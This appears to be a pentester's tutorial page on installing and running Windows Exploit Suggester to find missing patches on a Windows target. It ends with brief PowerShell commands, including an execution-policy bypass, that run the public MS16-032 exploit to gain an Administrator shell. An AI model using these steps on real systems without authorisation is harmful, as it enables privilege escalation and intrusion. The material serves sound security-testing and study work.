Skip to content

Windows Exploit Suggester

Original repo: https://github.com/AonCyberLabs/Windows-Exploit-Suggester

My forked: https://github.com/amandaguglieri/Windows-Exploit-Suggester

This tool compares a targets patch levels against the Microsoft vulnerability database in order to detect potential missing patches on the target. It also notifies the user if there are public exploits and Metasploit modules available for the missing bulletins.

We will create an environment for running python2.7.18, which is required:

# List my pyenv python versions and 2.7.18 is missing
pyenv versions

# Install version 2.7.18 
pyenv install 2.7.18

# Create a virtualenv that uses python2.7.18
pyenv virtualenv 2.7.18 tooling2

# Activate the env
pyenv activate tooling2

# Make sure you have the 2.7.18 python version running
python -V

# Install python dependencies
sudo wget https://files.pythonhosted.org/packages/28/84/27df240f3f8f52511965979aad7c7b77606f8fe41d4c90f2449e02172bb1/setuptools-2.0.tar.gz

sudo tar -xf setuptools-2.0.tar.gz
cd setuptools-2.0/
python setup.py install

cd ..

sudo wget https://files.pythonhosted.org/packages/42/85/25caf967c2d496067489e0bb32df069a8361e1fd96a7e9f35408e56b3aab/xlrd-1.0.0.tar.gz
sudo tar -xf xlrd-1.0.0.tar.gz
cd xlrd-1.0.0/
python  setup.py install

Now we will gather Systeminfo command output from the windows host target:

systeminfo

And we will save this in out kali machine as systeminfo.txt.

Install the Windows Exploit Suggerster:

1
2
3
git clone https://github.com/amandaguglieri/Windows-Exploit-Suggester.git

cd Windows-Exploit-Suggester

We then need to update our local copy of the Microsoft Vulnerability database. This command will save the contents to a local Excel file.

python windows-exploit-suggester.py --update

Output:

1
2
3
[*] initiating winsploit version 3.3...
[+] writing to file 2025-04-29-mssb.xls
[*] done

Running Windows Exploit Suggester:

python windows-exploit-suggester.py  --database 2025-04-29-mssb.xls --systeminfo systeminfo.txt 

#### Exploiting MS16-032 with PowerShell PoC

We will use: https://www.exploit-db.com/exploits/39719

1
2
3
Set-ExecutionPolicy bypass -scope process
Import-Module .\Invoke-MS16-032.ps1
Invoke-MS16-032

And we obtain a cmd with Administrator level

Last update: 2025-05-18
Created: May 18, 2025 16:41:27